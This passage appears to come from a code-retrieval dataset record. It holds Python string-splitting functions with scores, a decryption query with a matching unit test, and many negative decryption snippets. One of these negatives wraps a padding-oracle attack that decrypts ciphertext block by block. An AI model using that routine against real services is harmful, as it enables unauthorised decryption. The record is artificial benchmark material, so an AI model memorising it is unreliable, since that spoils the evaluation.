\"Word\", \"EllipsisCharacter\", \"EllipsisWord\", \"EllipsisPath\"] # noqa: E501\n if not trimming.isdigit():\t\n if trimming not in allowed_values:\n raise ValueError(\n \"Invalid value for `trimming` ({0}), must be one of {1}\" # noqa: E501\n .format(trimming, allowed_values))\n self._trimming = trimming\n else:\n self._trimming = allowed_values[int(trimming) if six.PY3 else long(trimming)]", "async def split_list(arr, size=100):\n\n arrs = []\n\n while len(arr) > size:\n pice = arr[:size]\n arrs.append(pice)\n arr = arr[size:]\n\n arrs.append(arr)\n return arrs", "def Split(text, delimiter=\" \", limit=-1, compare=None):\n if compare is not None:\n raise VB2PYNotSupported(\"Compare options for Split are not currently supported\")\n #\n if limit == 0:\n return VBArray(0)\n elif limit > 0:\n return Array(*str(text).split(delimiter, limit - 1))\n else:\n return Array(*str(text).split(delimiter))", "def splitlines(self) -> List[String]:\n pass", "def __split_seq(self, sequence):\n seq = copy.copy(sequence)\n result = \"\"\n while len(seq) > self._max_len:\n if seq[self._max_len] == \"\":\n result += seq[:self._max_len] + \"\\n\"\n seq = seq[self._max_len:]\n else:\n whitespace_index = self._max_len - seq[:self._max_len][::-1].find(\" \")\n result += seq[:whitespace_index] + \"\\n\"\n seq = seq[whitespace_index:]\n result += seq\n return result", "def split_text(text: Union[str, List], max_size: int = 2000, delimiter: str = \"\\n\") -> List[str]:\n delim_length = len(delimiter)\n\n if isinstance(text, str):\n if len(text) < max_size:\n return [text]\n text = text.split(delimiter)\n else:\n if sum(len(i) for i in text) < max_size:\n return [\"\\n\".join(text)]\n\n output = []\n tmp_str = \"\"\n count = 0\n for fragment in text:\n fragment_length = len(fragment) + delim_length\n if fragment_length > max_size:\n raise ValueError(\"A single line exceeded the max length. Can not split!\") # TODO: Find a better way than throwing an error.\n if count + fragment_length > max_size:\n output.append(tmp_str)\n tmp_str = \"\"\n count = 0\n\n count += fragment_length\n tmp_str += f\"{fragment}{delimiter}\"\n\n output.append(tmp_str)\n\n return output", "def split(long_string, length):\r\n lines = []\r\n words = long_string.split(' ')\r\n line = ''\r\n while len(words) != 0:\r\n if line == '':\r\n line = words.pop(0)\r\n elif len(line) + len(words[0]) + 1 < length:\r\n line += ' ' + words.pop(0)\r\n else:\r\n lines.append(line)\r\n line = ''\r\n lines.append(line)\r\n return lines", "def truncate_ocr_sim_list(token, ocr_sims_list, limit=10):\n if len(ocr_sims_list) <= limit:\n return ocr_sims_list\n\n ocr_scores = set([sc for sim, sc in ocr_sims_list.items()])\n\n # Limit of 10 different scores allowed\n sorted_ocr_scores = sorted(ocr_scores, reverse=True)[:limit]\n ocr_list = []\n for score in sorted_ocr_scores:\n tmp_ocr_list = [ocr_sims for ocr_sims, ocr_score in ocr_sims_list.items() if ocr_score == score]\n\n if len(ocr_list) + len(tmp_ocr_list) > limit:\n list_len = limit - len(ocr_list)\n tmp_list = []\n\n while len(tmp_list) < list_len:\n tmp_list += select_lower_edit_distance(token, tmp_ocr_list)\n\n if len(ocr_list) + len(tmp_list) == limit: # Final list has exactly 10 elements\n ocr_list += tmp_list\n break\n else: # List has more than 10 arguments (need to chose only the n elements needed)\n alpha_tmp_list = []\n\n while len(alpha_tmp_list) != list_len:\n alpha_word = select_best_alphabetical_word(token, tmp_list)\n\n alpha_tmp_list.append(alpha_word)\n tmp_list = [tkn for tkn in tmp_list if tkn != alpha_word]\n\n ocr_list += alpha_tmp_list\n break\n elif len(ocr_list) + len(tmp_ocr_list) == limit:\n ocr_list += tmp_ocr_list\n break\n else: # len(ocr_list) + len(tmp_ocr_list) < limit\n ocr_list += tmp_ocr_list\n\n if len(ocr_list) != limit:\n raise IndexError(\"OCR list is still too big (\"+str(len(ocr_list))+\"/\"+str(limit)+\")\")\n\n return {tkn: ocr_sims_list[tkn] for tkn in ocr_list}", "def splitCount(self):\n return 0", "def abridged_str_from_list(self,\r\n entrylist,\r\n trim_length=0,\r\n override=False):\r\n\r\n if override:\r\n trim_length = KEYLENGTH\r\n if trim_length == 0:\r\n trim_length = self.default_dict['keytrim']\r\n\r\n returntext = EMPTYCHAR\r\n for term in entrylist:\r\n lastlength = len(returntext)\r\n returntext += term+', '\r\n if len(returntext) > trim_length:\r\n if lastlength > trim_length-10:\r\n return returntext[0 : lastlength-2]\r\n return returntext[:trim_length]\r\n return returntext[:-2]", "def __cleaning_split(self, text: str) -> list:\n splitted_word = self.__clean_text(text)\n splitted_word = splitted_word.split()\n return splitted_word", "def splitLine(string, overflow=70):\n w=[]\n n=len(string)\n for i in range(0,n,overflow):\n w.append(string[i:i+overflow])\n return w", "def cleanList(self, mylist):\r\n newlist = []\r\n for val in mylist:\r\n if val.strip() != '':\r\n newlist.append(val)\r\n myList = sorted(set(newlist))\r\n\r\n return newlist", "def get_first_non_empty(inputList, num):\n i = num\n outputList = []\n for item in inputList:\n if item.strip() == '':\n continue\n outputList.append(item.strip())\n i -= 1\n if i <= 0:\n break\n return outputList" ]
[ "0.61260587", "0.61242557", "0.60332996", "0.5976751", "0.59576887", "0.59357154", "0.59291357", "0.575979", "0.5731277", "0.56639487", "0.5637736", "0.5636854", "0.5605196", "0.5510604", "0.5455997", "0.54495543", "0.5449324", "0.544276", "0.54360414", "0.5429126", "0.54289603", "0.5424462", "0.5389596", "0.53759766", "0.5372024", "0.53625154", "0.53508806", "0.53421175", "0.53420347", "0.53279", "0.5282323", "0.5255473", "0.52456754", "0.5229721", "0.5221196", "0.5216531", "0.52129716", "0.52050024", "0.52006924", "0.5197693", "0.5196247", "0.51841164", "0.5181099", "0.5178952", "0.51695496", "0.5166754", "0.5148017", "0.5130183", "0.5117873", "0.5113257", "0.5110655", "0.5105287", "0.51010746", "0.5100124", "0.50941056", "0.5090288", "0.5089092", "0.50854343", "0.50749505", "0.5074813", "0.5069294", "0.50684714", "0.5065664", "0.5054085", "0.50524706", "0.5046033", "0.5042904", "0.5040696", "0.5034173", "0.50332737", "0.50208277", "0.50199246", "0.5018266", "0.5015818", "0.5010028", "0.5007935", "0.4996861", "0.49892518", "0.4981521", "0.4969872", "0.49661192", "0.49597844", "0.4943847", "0.49387836", "0.49381733", "0.4935854", "0.492607", "0.49240234", "0.4917535", "0.49131387", "0.49129203", "0.49071586", "0.49043685", "0.49040428", "0.49030456", "0.49021962", "0.48972136", "0.48911962", "0.4887064", "0.48854208" ]
0.66803694
0
It decrypts encrypted messages.
def test_decrypt_encrypted(self): encrypted = encrypt('message') decrypted = decrypt(encrypted) assert decrypted == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decrypt_message(encrypted_message):", "def decrypt(self, data):", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.CIPHER_TEXT_ALPH.index(letter.upper())\n output.append(self.PLAIN_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def decrypt_message(self, cipher):\n\t\tmessage = cipher ** self.private_key % self.hidden_primes_product\n\t\treturn message", "def decrypt(self, message):\n return self._keypair.decrypt(message)", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def decrypt(self, text):\n return self.encrypt(text)", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def decrypt(self, ciphertext):\n return self._transform(ciphertext, self._backward)", "async def decrypt(self, message: Message, jid: Optional[JID], tab: ChatTab):\n\n raise NotImplementedError", "def decrypt(self, message):\n #check validity of _private_key\n if self._private_key is None:\n raise Exception(\"invalid private key\")\n\n output = \"\"\n\n d = self._private_key[0]\n n = self._private_key[1]\n\n for i in xrange(len(ciphertext)):\n m = pow(ciphertext[i], d, n)\n output += int_to_string(m)\n return output", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def decrypt(self, message):\n # message = message.upper().split()\n # message = \"\".join(message)\n # desalting the message to remove 5 characters blocks\n padding = input(\"Have you used 5 characters blocks? y/n \")\n if padding == \"y\":\n message = message.replace(\" \", \"\")\n message = self.desalt_random(message)\n message = \"\".join(message)\n\n message = message.upper()\n message_list = []\n for ch in message:\n message_list.append(self.main_dict[ch][0])\n\n # OTP Encryption / process the message with OTP\n otp = input(\"What is the OTP that was generated for you during \"\n \"encryption process?: \")\n otp = otp.upper()\n random_otp = []\n for ch in otp:\n random_otp.append(self.main_dict[ch][0])\n\n # If OTP is correct, decrypt the message with mod27\n if len(message_list) != len(random_otp):\n print(\"You typed a wrong OTP.\")\n return None\n else:\n math_list = []\n for i, item in enumerate(message_list):\n if message_list[i] >= random_otp[i]:\n x = message_list[i] - random_otp[i]\n for key, value in self.main_dict.items():\n if value[0] == x:\n math_list.append(key)\n else:\n for key, value in self.main_dict.items():\n if item == value[0]:\n x = value[1] - random_otp[i]\n for key, value in self.main_dict.items():\n if value[0] == x:\n math_list.append(key)\n return \"\".join(math_list)", "def decrypt(message: str) -> str:\n return \"\".join(REVERSE_DICT[char] for char in message.split())", "def decrypt(self, message):\r\n\r\n # Example string\r\n message = message.lower()\r\n # Everything we can encrypt\r\n SYMBOLS = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\n for counter, key in enumerate(range(len(SYMBOLS))):\r\n # try again with each key attempt\r\n translated = \"\"\r\n\r\n for character in message:\r\n if character in SYMBOLS:\r\n symbolIndex = SYMBOLS.find(character)\r\n translatedIndex = symbolIndex - key\r\n\r\n # In the event of wraparound\r\n if translatedIndex < 0:\r\n translatedIndex += len(SYMBOLS)\r\n\r\n translated += SYMBOLS[translatedIndex]\r\n\r\n else:\r\n # Append the symbol without encrypting or decrypting\r\n translated += character\r\n\r\n # Output each attempt\r\n result = self.lc.checkLanguage(translated)\r\n if result:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": translated,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": f\"The rotation used is {counter}\",\r\n }\r\n # if none of them match English, return false!\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": None,\r\n }", "def decrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n decB64Msg = base64.decodestring(msg)\n\n f = open(myTmpDir + 'ct' + str(identity) + '.bin','wb')\n f.write(decB64Msg)\n f.close()\n\n os.popen(\"rsa.exe d \" + myTmpDir + \"ct\" + str(identity) + \".bin \" + myTmpDir + \"ptSender\" + str(identity) + \".bin\")\n\n with open(myTmpDir + \"ptSender\" + str(identity) + \".bin\", \"rb\") as f:\n readFile = f.read()\n # Convert to hex representation\n decMsg = bytes(readFile)\n\n # TODO: overwirite\n outText.insert(tkinter.END, decMsg)", "def decrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"decrypt.php\",msg)) as f:\n decryptedmessage = f.read().decode('utf-8',\"strict\")\n return decryptedmessage", "def decrypt(self, encrypted):\n\n encrypted = base64.b64decode(encrypted)\n IV = encrypted[:self.BLOCK_SIZE]\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return self._unpad(aes.decrypt(encrypted[self.BLOCK_SIZE:]))", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def _post_decrypt_checks(self, aad, plaintext, protected_message, request_id):", "def decrypt(self):\n # Grab the initialization vector from the front of the cipher-text\n iv = self.ciphertext[:AES.block_size]\n # Create a new AES object in Cipher Block Chaining mode\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return cipher.decrypt(self.ciphertext)[AES.block_size:].rstrip().decode(\"utf-8\"), iv", "def decrypt(self, ciphertext: str) -> str:\n\n return self.run(ciphertext, Cryptography.DECRYPT)", "def _decrypt(self):\n self._outfile = os.path.join(self.dest, self.plain_file)\n self._infile = self.encrypted_file\n self._log.info(\"Decrypting file '%s' to '%s'\", self.encrypted_file, self._outfile)\n with open(self.encrypted_file, \"rb\") as enc_file:\n openssl(\n \"enc\",\n \"-aes-256-cbc\",\n \"-d\",\n \"-pass\",\n \"file:{secret}\".format(secret=self.secret.keyfile),\n _in=enc_file,\n _out=self._outfile,\n )\n self._log.info(\"File '%s' decrypted to '%s'\", self.encrypted_file, self._outfile)\n return True", "def decrypt_text_file(self):\r\n\t\t#Ensures that the file has something that can be decrypted.\r\n\t\tfile_contains_message = True\r\n\t\twhile file_contains_message:\r\n\t\t\tfile_exists = True\r\n\t\t\t#Checks to see if the file exists.\r\n\t\t\twhile file_exists:\r\n\t\t\t\tself.text_file_name = input(\"Please enter the name of the text file you wish to decrypt in format |file_name.txt|.--> \")\r\n\t\t\t\tif \".txt\" in self.text_file_name:\r\n\t\t\t\t\tfile_exists = Doc_Control().check_for_file(self.text_file_name)\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontinue\r\n\t\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\t\twhile True: \r\n\t\t\t\tself.message = Doc_Control().open_file(self.text_file_name)\r\n\t\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\t\tfile_contains_message = False\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Your file does not contain an encryptable message.\")\r\n\t\t\t\t\tbreak\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tself.output_file = Doc_Control().assign_output_file()\r\n\t\toutput_file_obj = open(self.output_file, 'w')\r\n\t\toutput_file_obj.write(self.my_code)\r\n\t\toutput_file_obj.close()\t\t\r\n\t\tprint(\"\\nYour file has been decrypted.\")", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def decrypt(self, user_input):\n # extract the message and keyword\n message = user_input[0]\n keyword = user_input[1]\n\n # generate decryption key\n cipher_key = self.__generate_key(keyword, \"decrypt\")\n\n # process text\n return self.__process_text(cipher_key, message)", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decrypt_message(message: bytes, receiver_private_key: RsaKey) -> bytes:\n iv = message[:IV_LEN]\n enc_aes_key = message[IV_LEN:IV_LEN + receiver_private_key.size_in_bytes()] # Assume encryption has been done with same key size\n enc_message = message[IV_LEN + receiver_private_key.size_in_bytes():]\n\n cipher_rsa = PKCS1_OAEP.new(receiver_private_key)\n aes_key = cipher_rsa.decrypt(enc_aes_key)\n\n cipher_aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(cipher_aes.decrypt(enc_message), AES.block_size) # Padding have to be removed", "def decrypt_faces(msg, nkey=key):\n newmsg = msg[:-20]\n obj = DES.new(nkey, DES.MODE_ECB)\n return obj.decrypt(newmsg)", "def _decrypt_string(self, event):\n _LOGGER.debug(\"Hub: Decrypt String: Original: %s\", str(event.encrypted_content))\n resmsg = self._decrypter.decrypt(unhexlify(event.encrypted_content)).decode(\n encoding=\"UTF-8\", errors=\"replace\"\n )\n _LOGGER.debug(\"Hub: Decrypt String: Decrypted: %s\", resmsg)\n event.parse_decrypted(resmsg)", "def decrypt(self, ciphertext):\n text = []\n # ciphertext = ciphertext.upper()\n for char in ciphertext:\n try:\n key = math_utils.mult_mod_inv(self.a, len(self.characters)) * (self.characters.index(char) - self.b) % len(self.characters)\n # If character is not in set for cipher,\n # directly append it without transformation\n except ValueError:\n text.append(char)\n else:\n text.append(self.characters[key])\n return ''.join(text)", "def decrypt():\n request_data = request.get_json()\n\n if ('ciphertext' in request_data and\n 'tag' in request_data and\n 'enc_session_key' in request_data and\n 'nonce' in request_data):\n\n try:\n for key in request_data.keys():\n request_data[key] = b64decode(request_data[key])\n except binascii.Error:\n return Response(\n json.dumps(\n {\n 'error': 'Malformed payload'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n encryption = Decryption(request_data['enc_session_key'], request_data['nonce'])\n try:\n message = encryption.decrypt(\n (request_data['ciphertext'], request_data['tag'])\n ).decode()\n except ValueError as error:\n return Response(\n json.dumps(\n {\n 'error': f'Failed to decrypt the message due to the error: [{error}]'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n return jsonify({'message': message}), 200\n\n return Response(\n json.dumps(\n {\n 'error': (\n 'Tag / Ciphertext / Nonce / Encrypted Session Key'\n ' missing in the request body'\n )\n }\n ),\n 400,\n mimetype='application/json'\n )", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def decrypt(ciphertext: str) -> Iterable:\n return simplesubstitution.decrypt(KEY, ciphertext)", "def decrypt(self, message):\n message = base64.b64decode(message)\n initialization_vector = message[:self._block_size]\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n raw_message = cipher.decrypt(message[self._block_size:])\n return self._remove_padding(raw_message).decode('utf-8')", "def ecb_decrypt(self, encrypted_data, color):\n msg = b''\n for d in encrypted_data:\n encoded_bytes = d[0] + d[1]\n encoded_int = self.bytes_to_int(encoded_bytes)\n decoded_int = self.power(encoded_int, self.private_key, self.N)\n decoded_byte = self.int_to_bytes(decoded_int, len(d[0]))\n msg += decoded_byte\n return msg", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt(self, ciphertext, key):\n iv = ciphertext[:AES.block_size]\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n plaintext = cipher.decrypt(ciphertext[AES.block_size:])\n return self.pkcs7_unpad(plaintext)", "def decrypt_symmetric(self, ciphertext):\n from google.cloud import kms_v1\n\n # Creates an API client for the KMS API.\n client = kms_v1.KeyManagementServiceClient()\n\n # The resource name of the CryptoKey.\n name = client.crypto_key_path_path(self.project_id, self.location_id, self.key_ring_id,\n self.crypto_key_id)\n # Use the KMS API to decrypt the data.\n response = client.decrypt(name, ciphertext)\n return response.plaintext", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt(self, data):\n if not data:\n return ''\n data = self._crypt(data, self.DECRYPT)\n return self._unpad_data(data)", "def decrypt_message(self, env_key, data):\n\n if not env_key or not data:\n raise Exception('Arguments missing.')\n\n key = RSA.importKey(self.private_key)\n try:\n env_key = unquote(env_key).decode('utf8')\n data = unquote(data).decode('utf8')\n except AttributeError:\n # Python 3 compatible\n env_key = unquote(env_key)\n data = unquote(data)\n\n try:\n env_key = base64.b64decode(env_key)\n data = base64.b64decode(data)\n \n cipher = PKCS1_v1_5.new(key)\n\n sentinel = []\n session_key = cipher.decrypt(env_key, sentinel)\n\n rc4_cipher = ARC4.new(session_key)\n\n xml_data = rc4_cipher.decrypt(data)\n\n # TODO: add xml validation\n # schema_root = etree.XML(xml_data)\n # schema = etree.XMLSchema(schema_root)\n # parser = etree.XMLParser(schema=schema)\n\n return xml_data\n except Exception as e:\n if self.developement:\n exception(e)\n\n raise Exception('Could not decrypt message.')", "def _decrypt(data):\n cipher = AES.new(bytes(_AES_KEY), AES.MODE_CBC, bytes(_AES_IV))\n return cipher.decrypt(data)", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def decrypt(ciphertext, key, iv):\n cipher = AES.new(key, AES.MODE_CFB, iv)\n msg = cipher.decrypt(ciphertext)\n return msg", "def decrypt_message(data,symetric_key,private_key):\n\tif type(data) == str or type(data) == bytes:\n\t\tdata = json.loads(data)\n\ttyp = data['type']\n\tnonce = data['nonce'].encode(\"iso-8859-1\")\n\tmessage = data['message'].encode(\"iso-8859-1\")\n\tnonce, *_ = decrypt(private_key,nonce)\n\tmessage = AESCCM(symetric_key).decrypt(nonce,message,None)\n\tmessage ={'type':typ,'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\treturn message", "def decrypt(self, encrypted: str) -> str: # type: ignore\n passphrase = self.passphrase\n encrypted = base64.b64decode(encrypted) # type: ignore\n assert encrypted[0:8] == b\"Salted__\"\n salt = encrypted[8:16]\n key_iv = self.bytes_to_key(passphrase.encode(), salt, 32 + 16)\n key = key_iv[:32]\n iv = key_iv[32:]\n aes = AES.new(key, AES.MODE_CBC, iv)\n try:\n return self.unpad(aes.decrypt(encrypted[16:])).decode() # type: ignore\n except UnicodeDecodeError:\n raise ValueError(\"Wrong passphrase\")", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt_msg(msg, query, padding, iv=None, blocksize=16, threads=1):\n # Input validation\n msg = bytearray(msg)\n assert len(msg) % blocksize == 0\n if iv is not None:\n iv = bytearray(iv)\n assert len(iv) == blocksize\n msg = iv + msg\n else:\n assert len(msg) > blocksize\n\n # Split into \"iv\", ciphertext pairs\n blocks = chop(bytearray(msg), blocksize)\n pairs = zip(blocks, blocks[1:])\n\n # Decrypt every pair seperately (to minimize query size)\n logger.info('Decrypting %d block[s] of data using a padding oracle' % len(pairs))\n out = bytearray()\n for n, (iv, block) in enumerate(pairs):\n logger.info('Decrypting block %d' % n)\n out += decrypt(iv, block, query, padding, threads)\n logger.info('Decrypted block: %s' % hex(out[-blocksize:]))\n return out", "def decrypt_message(self):\n token = bytes(self.args['token'].encode('utf-8'))\n message = base64.urlsafe_b64decode(token)\n\n # Check that the message is valid (HMAC-SHA1 checking).\n if not self.check_hmac_signature(message):\n raise TokenAuthenticationError('HMAC authentication failed')\n\n init_vector = message[:16]\n enc_message = message[16:-20]\n\n aes = AES.new(bytes(self.settings['aes_key'].encode('utf-8')), AES.MODE_CBC, init_vector)\n message = aes.decrypt(enc_message).decode('utf-8')\n\n # Get the login data in an easy-to-use tuple.\n try:\n login_data = self.get_login_data(message)\n except AttributeError:\n # Regex failed, so data was not valid.\n raise TokenAuthenticationError('Message does not contain valid login data')\n\n name = login_data[2].strip()\n first_name = name.split(' ').pop(0)\n parts = name.split(' ')\n parts.pop(0)\n last_name = \" \".join(parts)\n email = login_data[3].strip()\n email = ''.join(x for x in email if x in string.printable)\n\n data = {\n 'timestamp': login_data[0],\n 'remote_id': email,\n 'email': email,\n 'first_name': first_name,\n 'last_name': last_name,\n 'username': email\n }\n\n return data", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def decryptMessage():\n exponents = [2, 1, 0]\n encryptedMessage = input(\"Please enter the RSA encrypted message: \\n\")\n messageSplit = encryptedMessage.split(\" \")\n print(\"\")\n for c in messageSplit:\n d = modInverse(PUBLIC_KEY[\"e\"], phi(PUBLIC_KEY[\"n\"]))\n p = (int(c) ** d) % PUBLIC_KEY[\"n\"]\n for e in exponents:\n letter = math.trunc((p/pow(26, e)) % 26)\n print(ALPHABET[letter], end=\"\")\n print(\" \", end=\"\")\n print(\"\")", "def decrypt(self, in_, out):\n try:\n # Bytes read from in will be decrypted\n \n out.write(pyDes.des.decrypt(in_.read()))\n # Read in the decrypted bytes and write the cleartext to out\n out.close()\n except Exception as e:\n print e\n pass", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def decrypt(message):\r\n\r\n assert isinstance(message, str), 'Only encrypt strings only!'\r\n decrypted_message = ''\r\n\r\n final_dot = False\r\n final_question = False\r\n final_comma = False\r\n final_dot_counter = 0\r\n final_question_counter = 0\r\n final_comma_counter = 0\r\n\r\n while message[-1] == '.':\r\n message = message[:-1]\r\n final_dot = True\r\n final_dot_counter += 1\r\n\r\n while message[-1] == '?':\r\n message = message[:-1]\r\n final_question = True\r\n final_question_counter += 1\r\n\r\n while message[-1] == ',':\r\n message = message[:-1]\r\n final_comma = True\r\n final_comma_counter += 1\r\n\r\n\r\n for message_word in message.split():\r\n file = open(\"words.txt\", \"r\")\r\n checked = False\r\n middle_dot = False\r\n middle_question = False\r\n middle_comma = False\r\n middle_dot_counter = 0\r\n middle_question_counter = 0\r\n middle_comma_counter = 0\r\n\r\n while message_word[-1] == '.':\r\n message_word = message_word[:-1]\r\n middle_dot = True\r\n middle_dot_counter += 1\r\n\r\n while message_word[-1] == '?':\r\n message_word = message_word[:-1]\r\n middle_question = True\r\n middle_question_counter += 1\r\n\r\n\r\n while message_word[-1] == ',':\r\n message_word = message_word[:-1]\r\n middle_comma = True\r\n middle_comma_counter += 1\r\n\r\n for line in file:\r\n file_word = line.split()[2]\r\n if message_word == file_word:\r\n decrypted_message += 